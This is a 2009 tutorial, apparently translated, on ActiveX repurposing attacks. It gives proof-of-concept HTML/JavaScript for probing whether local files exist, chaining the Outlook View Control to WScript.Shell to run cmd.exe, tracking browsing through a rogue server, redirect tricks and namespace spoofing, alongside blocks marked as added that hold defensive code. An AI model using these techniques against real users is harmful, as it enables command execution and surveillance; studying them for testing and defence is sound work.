ActiveX repurposing attacks: special tips and techniques - vulnerability warning - the black bar safety net

ID MYHACK58:62200925685
Type myhack58
Reporter Anonymous
Modified 2009-12-21T00:00:00


Copyright (c) 2009 Czy Invicta <Hack01@Live!cn> All rights reserved.

==> 0x00 [Foreword]
~~~~~~~~~~~~~~~~~~~

In this article I will not cover the basic attack scenarios against ActiveX controls. What I want to discuss are a number of interesting tips and techniques for finding and exploiting repurposing flaws in ActiveX controls, which you can use in your tests whether you are a penetration tester or a member of the computer underground. Of course, you must first master the basics, so that reading this article does not bring you up against difficulties that dampen your enthusiasm. Below I describe each technique and write out example code for the special cases worth mastering. Incidentally, to avoid the danger of jail or losing your job, make sure you have permission to perform the following techniques on the organization's or enterprise's network; I strongly suggest you keep a printed copy of the authorization.

==> 0x01 [Exception handling: using try-catch]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Generally speaking, an ActiveX control does not hand back the contents of files stored on the local hard disk, but the error messages an ActiveX control returns to Internet Explorer often give an attacker useful information. To receive these exceptions in JavaScript, wrap the call to the method or property that produces the error in a try-catch block in your test code. Fundamentally, these vulnerabilities live in methods and properties named Load, Open, or *File; basically, anything that attempts to load or open a file should be tested. The following is a simple example of how to build such a test case, though it is not necessarily perfect. Here an attacker wants to confirm whether the file set in the control's ConfigLocation property exists. If the file loads successfully, the code does not enter the catch block; if it does not load, the code enters the catch block.

<OBJECT id="AX" classid="CLSID:12345678-1234-1234-1234-123456789ABC"></OBJECT>
<script>
try {
    AX.ConfigLocation = "c:\\secret.txt";
    alert("File exists!");
} catch (oException) {
    alert("File does not exist");
}
</script>

Just because the control throws an exception and the code enters the catch block does not necessarily mean the file does not exist. Many things can potentially fail at load time, such as the user cancelling a cross-domain warning, and these also produce an error. However, if the control provides error details, the attacker can probe further. When the code reaches the catch block, different errors are represented by different numbers. In this particular example, the ConfigLocation property works like this:

1. Obtain the file name from the value
2. First check whether the extension is .xml or .txt
3. Then check whether the file exists
4. Finally, check whether it is a valid XML file

Here there are at least three different places where it can fail, and because of that it returns different error numbers, which give the attacker important information. To analyze this specific information, the attacker adds logic to the catch statement to look for the specific exception number, like the following:

<OBJECT id="AX" classid="CLSID:12345678-1234-1234-1234-123456789ABC"></OBJECT>
<script>
try {
    AX.ConfigLocation = "c:\\secret.txt";
    alert("File exists!");
} catch (oException) {
    // The number used to indicate that the file does not exist
    if (oException.number == "2471683291") {
        alert("File does not exist");
    } else {
        alert("File exists!");
    }
}
</script>

A prompt from me: typically, if two different error events carry the same exception number, then the exception's description or message property will also be the same. But this is not always the case; it also depends on where in the code the description is set.

==> 0x02 [Return values]
~~~~~~~~~~~~~~~~~~~~

The programmer may have done a very good job and confirmed that the exceptions caught for an existing file and for a non-existent file cannot be distinguished, but in fact there are other ways to find out whether the file really exists. What does a *Load method return? For example, consider the following code, which calls an OpenFile method. Suppose that after trying the try-catch approach and a few other test cases, everything looks fine.

<script>
OpenFile("c:\\secret.txt");
</script>

Digging deeper, you learn that OpenFile returns a Boolean value. Interesting. What happens when the attacker makes use of it?

<script>
// A return value of true means the file exists
if (OpenFile("c:\\secret.txt")) {
    alert("File Exists!");
} else {
    alert("File Does Not Exist");
}
</script>

Here OpenFile returns a Boolean, but a long or any other data type works just as well; adapt the check to your needs. Look closely at the return value in a case like this: it tells you whether the file exists.
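To make the leak in 0x01 and 0x02 concrete from the defender's side, here is an added example that is not part of the original article: a simulated configuration loader that reproduces the four-step ConfigLocation sequence with a distinct error number per stage, beside a hardened version that refuses local paths outright and collapses every disk-dependent failure into one code. The "disk" is a constructed in-memory map, and the names loadConfigLeaky, loadConfigHardened, probe and the error constants are hypothetical.

```javascript
// Added example, not code from the original article. The content store below is
// constructed for this example and stands in for the local disk plus a remote host.
const FAKE_STORE = {
  "c:\\public.xml": "<config><item/></config>",   // exists, valid XML
  "c:\\secret.txt": "not xml at all",              // exists, not XML
  "c:\\notes.xml": "<config><unclosed>",           // exists, malformed XML
  "https://www.example.com/app.xml": "<config><item/></config>",
};

// Leaky control: one error number per failure stage (hypothetical values).
const ERR_BAD_EXTENSION = 1001;
const ERR_NOT_FOUND = 1002;
const ERR_INVALID_XML = 1003;
// Hardened control: a single number for anything that depends on what is on disk.
const ERR_LOAD_FAILED = 2001;

// Mimics the JScript exception object: the page reads oException.number.
class ControlError extends Error {
  constructor(number, message) {
    super(message);
    this.number = number;
  }
}

// Minimal well-formedness check: strip self-closing tags, then require the
// number of opening tags to equal the number of closing tags.
function looksLikeXml(text) {
  const noSelfClosing = text.replace(/<[^>]*\/>/g, "");
  const opens = (noSelfClosing.match(/<[A-Za-z][^>]*>/g) || []).length;
  const closes = (noSelfClosing.match(/<\/[A-Za-z][^>]*>/g) || []).length;
  return opens > 0 && opens === closes;
}

// Drive letter, UNC path or file: URL, i.e. anything on the user's machine.
function isLocalPath(path) {
  return /^(?:[a-z]:[\\\/]|\\\\|file:)/i.test(path);
}

// The pattern the article describes: extension, existence and parse checks each
// throw their own number, so a page can tell "missing" from "present but not XML",
// and a true return confirms existence on top of that (0x02).
function loadConfigLeaky(path, store = FAKE_STORE) {
  if (!/\.(xml|txt)$/i.test(path)) throw new ControlError(ERR_BAD_EXTENSION, "bad extension");
  if (!(path in store)) throw new ControlError(ERR_NOT_FOUND, "file not found");
  if (!looksLikeXml(store[path])) throw new ControlError(ERR_INVALID_XML, "invalid xml");
  return true;
}

// Hardened: a control hosted in a Web page never probes the local disk for the
// page, and every remaining failure is indistinguishable to the caller.
function loadConfigHardened(path, store = FAKE_STORE) {
  const fail = () => new ControlError(ERR_LOAD_FAILED, "configuration could not be loaded");
  if (isLocalPath(path)) throw fail();
  if (!/\.(xml|txt)$/i.test(path)) throw fail();
  if (!(path in store) || !looksLikeXml(store[path])) throw fail();
  return true;
}

// What a hostile page learns from a single call: the exception number, or "loaded".
function probe(loader, path) {
  try {
    loader(path);
    return "loaded";
  } catch (e) {
    return e instanceof ControlError ? e.number : "unexpected";
  }
}
```

Run probe() with both loaders against "c:\\secret.txt" and "c:\\missing.txt": the leaky loader answers 1003 and 1002, which is exactly the existence oracle the article describes, while the hardened loader answers 2001 for both, and for the existing "c:\\public.xml" as well, so neither the number nor the success path tells the page anything about the disk.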

One more skill: besides using try-catch and considering the return value, do not forget to consider events. Sometimes the number of times an event fires also leaks information. A related and more subtle problem is the timing attack. Even if the control does not reveal that it failed to load a configuration file, the time the operation takes may let an attacker know whether an attempt was made to parse the file.

==> 0x03 [Embedded objects]
~~~~~~~~~~~~~~~~~~~~~~~

I love this tip: once the Internet Explorer scripting engine holds an interface pointer, neither the object itself nor anything inside it is safe any longer. This means that you can reach unsafe objects through a safe object without any warning, which of course also means that the safe object is not actually safe. Look at the example below. The Microsoft Office Outlook View Control is very useful to solution providers and developers who want to integrate Outlook functionality with other Internet plug-ins. In this example, the control also proves to be unsafe. The example shows how an ActiveX control can give a Web page script access to more powerful COM objects that Internet Explorer would never allow a script to create.

<object id="ViewControl" classid="clsid:0006F063-0000-0000-C000-000000000038">
    <param name="Folder" value="Inbox">
</object>
<script>
function DoIt() {
    oItem = ViewControl.object.selection.Item(1);
    oWSh = oItem.Session.Application.CreateObject("WScript.Shell");
    oWSh.Run("cmd.exe /k echo ProofOfConcept");
}
setTimeout("DoIt()", 2500);
</script>

How does it work? The attacker first specifies a PARAM in the <object> tag for the Inbox, because the Inbox is the folder most likely to contain items.

<object id="ViewControl" classid="clsid:0006F063-0000-0000-C000-000000000038">
    <param name="Folder" value="Inbox">
</object>

The first script to run is the setTimeout("DoIt()", 2500) call, which waits 2.5 seconds. The attacker needs this time because Outlook sometimes takes a while to talk to the mail server and load the Inbox. Then the script calls the DoIt function, where the real work happens.

function DoIt() {
    oItem = ViewControl.object.selection.Item(1);
    oWSh = oItem.Session.Application.CreateObject("WScript.Shell");
    oWSh.Run("cmd.exe /k echo ProofOfConcept");
}

How does DoIt work?

oItem = ViewControl.object.selection.Item(1);

ViewControl.object refers to the control's own object model, which is better than going through Internet Explorer. The latter point is easy to overlook: if the script referenced ViewControl.selection instead of ViewControl.object.selection, Internet Explorer would return something different for the Selection property. ViewControl.object.selection is a collection of MailItem objects; even though it cannot be created directly from JavaScript, it can still be stored in a JavaScript variable.

Note: when creating test cases, be sure to confirm that you are calling the object itself rather than the Internet Explorer Document Object Model. You can check this in the debugger by setting a breakpoint in the script and inspecting the attached object.

Because ViewControl.object.selection is a collection, it supports the Item method, which returns a single entry from the collection, so the attacker can get the first entry in the Inbox and store it in oItem. Outlook collections are 1-based, unlike Internet Explorer collections, which are 0-based. At this point the script engine no longer references the Outlook View Control; the script now holds an ordinary Outlook MailItem object. The MailItem object is not safe, but because it was created by the Outlook View Control rather than by Internet Explorer, there is no warning.

An important point in passing: the objects a control creates do not fall under Internet Explorer's security model. This means you also need to test the security of those objects further, even if your programmer did not write them, because your control exposes those objects as if they were browser-safe.

oWSh = oItem.Session.Application.CreateObject("WScript.Shell");

What properties and methods does this object support? After verification, the script can first get the Messaging Application Programming Interface session and then the main Outlook.Application object. That object has a CreateObject method, which creates a COM object on the local system; the Windows Script Host WScript.Shell object, which can run any command, is a good choice.

oWSh.Run("cmd.exe /k echo ProofOfConcept");

Normally the WScript.Shell object cannot be scripted, because Internet Explorer will not create this object from script unless its security settings are set to Low or the user accepts a prompt. However, the Outlook View Control creates the Outlook.Application object, and the Outlook.Application object in turn creates the WScript.Shell object. Thus the object becomes available to script in Internet Explorer. How do you identify these types of objects? Look for objects, methods and properties that return objects or collections. In fact, I list the five kinds of data you should pay close attention to:

· IDispatch and IDispatch* must be objects. Note that an asterisk suffix indicates that the type is a pointer rather than a value.
· VARIANT and VARIANT* mean the data type is not fixed and may contain anything, including an object. Note that a VARIANT without an asterisk can still contain an interface pointer.
· Data types that the debugger watch window shows to be a given object.
· Data types for which alert(variable) in Internet Explorer returns [object].
· Unidentified data types.

One more trick: the VBScript TypeName function returns the type of the specified object at run time.
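Reviewing a type library for the five kinds of data listed above is tedious by hand, so here is an added example, not part of the original article, that scans an IDL dump (the kind of text OleView or a similar type library viewer produces) and lists every member whose [out, retval] type can carry an interface pointer: IDispatch* or IUnknown*, VARIANT with or without a pointer, and typelib-defined interface names passed as double pointers. The IDL text is constructed for the example and is not the real Outlook type library; the function and constant names are hypothetical.

```javascript
// Added example, not code from the original article. SAMPLE_IDL is constructed;
// the member names only echo the script in 0x03 so the output is easy to read.
const SAMPLE_IDL = `
interface _Selection : IDispatch {
    [id(0x00000051), propget] HRESULT Count([out, retval] long* Count);
    [id(0x00000052)] HRESULT Item([in] VARIANT Index, [out, retval] IDispatch** Item);
};
interface _MailItem : IDispatch {
    [id(0x0000f00e), propget] HRESULT Session([out, retval] _NameSpace** Session);
    [id(0x0000f001), propget] HRESULT Subject([out, retval] BSTR* Subject);
    [id(0x0000f002), propget] HRESULT Application([out, retval] _Application** Application);
    [id(0x0000f003), propget] HRESULT Class([out, retval] OlObjectClass* Class);
};
interface _Application : IDispatch {
    [id(0x0000f0a0)] HRESULT CreateObject([in] BSTR ObjectName, [out, retval] IDispatch** Object);
    [id(0x0000f0a1)] HRESULT Quit();
};
`;

// Automation types that can never hold an interface pointer.
const SCALAR_TYPES = new Set([
  "long", "short", "int", "BSTR", "DATE", "CY", "double", "float", "VARIANT_BOOL",
  "unsigned long", "unsigned short", "unsigned char", "char", "HRESULT", "void",
]);

// Map a retval type string to one of the article's categories.
//   "object"  : IDispatch*/IUnknown*, or a typelib interface passed as T** (the
//               usual shape for an object return in IDL)
//   "variant" : VARIANT or VARIANT*, may contain an object
//   "unknown" : anything else not known to be scalar (e.g. an enum), review by hand
//   "scalar"  : a plain value, safe to ignore for this purpose
function classifyRetval(type) {
  const base = type.replace(/\*+$/, "").trim();
  const pointerDepth = (type.match(/\*/g) || []).length;
  if (base === "IDispatch" || base === "IUnknown") return "object";
  if (base === "VARIANT") return "variant";
  if (SCALAR_TYPES.has(base)) return "scalar";
  return pointerDepth >= 2 ? "object" : "unknown";
}

// Walk every interface block, then every HRESULT member inside it, and pull the
// [out, retval] parameter's type. Members without a retval (e.g. Quit) are skipped.
function findObjectReturningMembers(idl) {
  const results = [];
  const interfaceRe = /interface\s+(\w+)\s*(?::\s*\w+)?\s*\{([\s\S]*?)\}\s*;?/g;
  const memberRe = /HRESULT\s+(\w+)\s*\(([^)]*)\)/g;
  const retvalRe = /\[\s*out\s*,\s*retval\s*\]\s*((?:unsigned\s+)?\w+\**)\s+\w+\s*$/;
  let iface;
  while ((iface = interfaceRe.exec(idl)) !== null) {
    const [, ifaceName, body] = iface;
    let member;
    while ((member = memberRe.exec(body)) !== null) {
      const [, memberName, params] = member;
      const retval = retvalRe.exec(params.trim());
      if (!retval) continue;
      const category = classifyRetval(retval[1]);
      if (category === "scalar") continue;
      results.push({ interface: ifaceName, member: memberName, type: retval[1], category });
    }
  }
  return results;
}

// Human-readable lines, e.g. "_Selection.Item -> IDispatch** (object)".
function summarize(idl) {
  return findObjectReturningMembers(idl).map(
    (m) => `${m.interface}.${m.member} -> ${m.type} (${m.category})`
  );
}
```

On the constructed IDL the scan flags Selection.Item, MailItem.Session, MailItem.Application and Application.CreateObject as object returns and MailItem.Class as unknown, which is precisely the chain the DoIt function walks; Count, Subject and Quit drop out as scalars or no-return members. The "unknown" bucket is deliberate: an enum is harmless, but a typelib type you cannot identify is the article's fifth category and deserves a look in the debugger.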

==> 0x04 [Control persistence: Browser Helper Objects (BHO)]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Consider COM components that are not unloaded together with the HTML page. BHOs are one example of such components. They differ from ActiveX controls because they are usually loaded when Internet Explorer starts or when the user clicks a menu item, and they respond to various events such as navigating to a Web page and submitting a form. A BHO has full access to the Web browser and to all content on the Web page. BHOs can be scripted from a Web page, and like other ActiveX controls they are susceptible to repurposing attacks. If your control has BHO-like features, or remains active after the user leaves the page, then you should think carefully about the following control example, which lets any malicious user track a victim's Internet usage.

Hint: in your tests, do not treat each ActiveX control as an isolated unit; think of it as part of a larger environment.

This feature manages conferencing threads on a Web server; when a specific page is opened in Internet Explorer, the feature shows a conferencing toolbar at the bottom of the application window. The user can then use commands on this toolbar to add a conferencing server and specify which conference information to display, or to pre-specify a particular Web page or directory on the Web server. In this particular case, the control I examined has the following two interesting methods:

· Open the conferencing toolbar
· Set the default conferencing server

Apart from weaknesses in the mechanism for communicating with the server, the control itself does not seem very harmful. Once the conferencing toolbar is activated, the control contacts the specified conferencing server to see whether the server has a conference for a particular URL. This is done with an HTTP request, in which the URL of the page being viewed and the user name are passed as query string parameters.

Another aside: remember that ActiveX controls and BHOs are essentially Win32 executables. Tools like Network Monitor and other security testing tools help you assess the control's actual behavior, and their value is incalculable. Don't take it for granted that the browser generates all of the network traffic.

So an attacker could launch the toolbar and set their own server as the default server. Then the attacker only needs to look through their network log files to see which sites the victim visited. If the victim logs in to a site or submits sensitive information in a query string parameter, even session information or other private content sent over a Secure Sockets Layer session, the harm to that site is greater still.

==> 0x05 [Server redirects]
~~~~~~~~~~~~~~~~~~~~~~~~~~~

Although I have not written many Web-based test cases on my blog, if you are a frequent visitor you will have noticed that my articles mention and use server redirects many times, which shows how important this technique is. If your control decides whether a URL is safe based on its domain, or presents a URL to the user and asks permission to handle it in a potentially insecure way, then you need to test for server redirects. Assume the control has only one method, LoadFromURL, which takes one parameter: a string value with the URL to load. Like the following code:

<script>
AX.LoadFromURL("http://www.good.example.com/goodpg.asp");
</script>

When this method is called, it pops up a dialog box asking whether the user really wants to load a file from the good.example.com domain. The user trusts good.example.com, so of course the user trusts the file. Now change the URL:

<script>
var sURL = "http://www.good.example.com/?redir=";
sURL += "http://www.bad.example.com/badpg.asp";
AX.LoadFromURL(sURL);
</script>

The dialog box pops up again asking whether the user wants to load the page from good.example.com. The user trusts good.example.com, so they click OK. Thus the control loads the file from bad.example.com. Why does this happen? The redirect is completely legitimate; many sites do this. In this example, there is a page on the good.example.com site that can redirect the user to other pages on the site. How does it work? The ASP page takes the value of the redir query string parameter and issues a Response.Redirect command, which redirects to whatever URL you put in the redir query string, bad.example.com in this case. Response.Redirect then answers the client with a 302 Object Moved or similar HTTP response, asking the client to request the new address at bad.example.com. The attacker repurposes this control together with the server redirect to fool the user into loading a file from a URL the user would not trust. Some developers use APIs that follow redirects automatically, so the redirect is hidden beneath the surface, which in fact serves the attacker.

==> 0x06 [Bypassing browser security settings]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

In Internet Explorer 8, great effort has gone into mitigating cross-site scripting attacks from the Internet and from the local machine. For a complete solution to cross-site scripting, ActiveX controls must also comply with the specification and must not redirect to local content. If Internet Explorer prohibits such a redirect but your ActiveX control redirects to local content, then the control becomes a way for an attacker to bypass Internet Explorer's security settings. To find these vulnerabilities, first determine where the control loads files or uses URLs. Then try to use these features of the ActiveX control to load local files. Finally, evaluate your efforts by observing the control's behavior or by using other tools such as FileMon. Here is a brief example of how it works:

<object classid="clsid:{12345678-1323-3214-3211-34514321342}" id="objBuggy"></object>
<script>
// The control loads the URL specified by the script into a new window and handles it as HTML
objBuggy.IsEditMode = 1;
// Now redirect to a local file.
// Note that the same script fails in an IE browser that does not contain this ActiveX control,
// because IE's security policy blocks this behavior.
objBuggy.ShowHTMLWindow();
</script>
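The fix for both 0x05 and 0x06 is the same: the trust decision has to be made on every URL the control actually ends up fetching, not only on the one the page handed in. Here is an added example that is not part of the original article. It follows a redirect chain hop by hop and re-applies the scheme and host policy at each hop, so a "do you trust good.example.com?" answer cannot be carried over to bad.example.com or to a file: URL. The network is replaced by a constructed redirect table (URL requested to the Location header the server would answer with); TRUSTED_HOSTS, REDIRECT_TABLE and the function names are hypothetical.

```javascript
// Added example, not code from the original article. Uses Node's global WHATWG URL.
const TRUSTED_HOSTS = new Set(["www.good.example.com"]);
const MAX_HOPS = 5;

// Constructed server behaviour: anything not listed answers 200 with no redirect.
const REDIRECT_TABLE = {
  // the open redirector from 0x05
  "http://www.good.example.com/?redir=http://www.bad.example.com/badpg.asp":
    "http://www.bad.example.com/badpg.asp",
  // a harmless same-site redirect with a relative Location header
  "http://www.good.example.com/legacy.asp": "/goodpg.asp",
  // the 0x06 case: a trusted server bouncing the control to the local disk
  "http://www.good.example.com/local.asp": "file:///c:/secret.txt",
  // a redirect loop
  "http://www.good.example.com/a": "/b",
  "http://www.good.example.com/b": "/a",
};

// The check the article warns about: it only looks at the URL the page supplied,
// so the user is asked about good.example.com and the content comes from elsewhere.
function naiveDecision(startUrl) {
  const u = new URL(startUrl);
  return { allowed: TRUSTED_HOSTS.has(u.hostname), finalUrl: u.href };
}

// Policy for a single hop, applied before that hop is fetched.
function hopProblem(u) {
  if (u.protocol !== "http:" && u.protocol !== "https:") return `scheme ${u.protocol} not allowed`;
  if (!TRUSTED_HOSTS.has(u.hostname)) return `untrusted host ${u.hostname}`;
  return null;
}

// Follow redirects manually instead of letting the HTTP library do it silently,
// and re-check every hop. Returns the full chain so a tester can see what happened.
function hardenedDecision(startUrl, table = REDIRECT_TABLE) {
  let current = new URL(startUrl);
  const chain = [current.href];
  for (let hop = 0; ; hop++) {
    const problem = hopProblem(current);
    if (problem) return { allowed: false, reason: `${problem} at hop ${hop}`, chain };
    const location = table[current.href];
    if (location === undefined) return { allowed: true, finalUrl: current.href, chain };
    if (hop >= MAX_HOPS) return { allowed: false, reason: "too many redirects", chain };
    let next;
    try {
      next = new URL(location, current); // a relative Location resolves against this hop
    } catch (e) {
      return { allowed: false, reason: "unparseable Location header", chain };
    }
    current = next;
    chain.push(current.href);
  }
}
```

With the redir URL from the article, naiveDecision() says yes because the hostname is www.good.example.com, while hardenedDecision() reports "untrusted host www.bad.example.com at hop 1" and returns the two-element chain, which is also the evidence you want in a test report. The same loop rejects the file: hop and the redirect loop, and still lets a same-site relative redirect through to its final URL.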

==> 0x07 [Namespaces and behaviors]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Binary behaviors work like ActiveX controls: a behavior is bound to a specific HTML tag, can be initialized from the tag's attributes, and can be scripted by referencing the tag's ID or name. A behavior is able to control every aspect of its HTML element, capturing events, setting values and so on. From a security perspective, binary behaviors are like ActiveX controls. The programmer of one specific ActiveX control used the control's ImportList method to block potential malicious attacks through the binary behavior. In normal use, the control is loaded as a behavior of an <input type=file/> element, as in the following code:

<object classid="clsid:{BDEADE9E-C265-11d0-BCED-00A0C90AB50F}" id="LauncherObj" style="display:none;"></object>
<input id="SpreadsheetFile" type="file" name="SpreadsheetFile" style="behavior: url(#LauncherObj);">

The HTML element <input type=file/> does not allow script to set the value property, which contains the name of the file to upload; otherwise a malicious Web site could upload any file from the user's hard drive. Therefore the control's programmer added a security check so that the control can only be bound to an HTML <input> element with type=file. How does an attacker bypass this binary behavior's security mechanism? There is no way to make the control access the file directly through the input element. Put another way, the attacker must trick the control into thinking it has been loaded into an input element, when in fact the behavior is bound to some other element. This is done using HTML namespaces and their extensions. In short, a namespace can be added to any HTML document with the following code:

<HTML XMLNS:NETSPY>

In this example the namespace is NETSPY. By prefixing the tag name with the namespace name, a namespace can be applied to a particular HTML tag:

<NETSPY:IMG src="http://example.com/one.jpg">

By defining an HTML namespace, the attacker deceives the control into thinking it was loaded through an <input type=file/> element. Then, by setting the extended attribute value=c:\filename.txt, the attacker can use the control to detect whether a local file exists, and can carry out other malicious behaviors as well.

==> 0x08 [Epilogue]
~~~~~~~~~~~~~~~~~~~

At the end of the article, I have to remind you that ActiveX controls are very easy to drive through automation. Using this, the features and functions of a control that may introduce vulnerabilities can be detected automatically, just like the automation code I tailored for my own remote-authentication intrusions, and more specifically a one-stop service for scanning, exploitation and self-implantation. If you have any questions, please send a letter to my E-Mail (Hack01[at]Live{dot}cn).

Thanks to the members of the computer underground organization C4[H] and to my brother!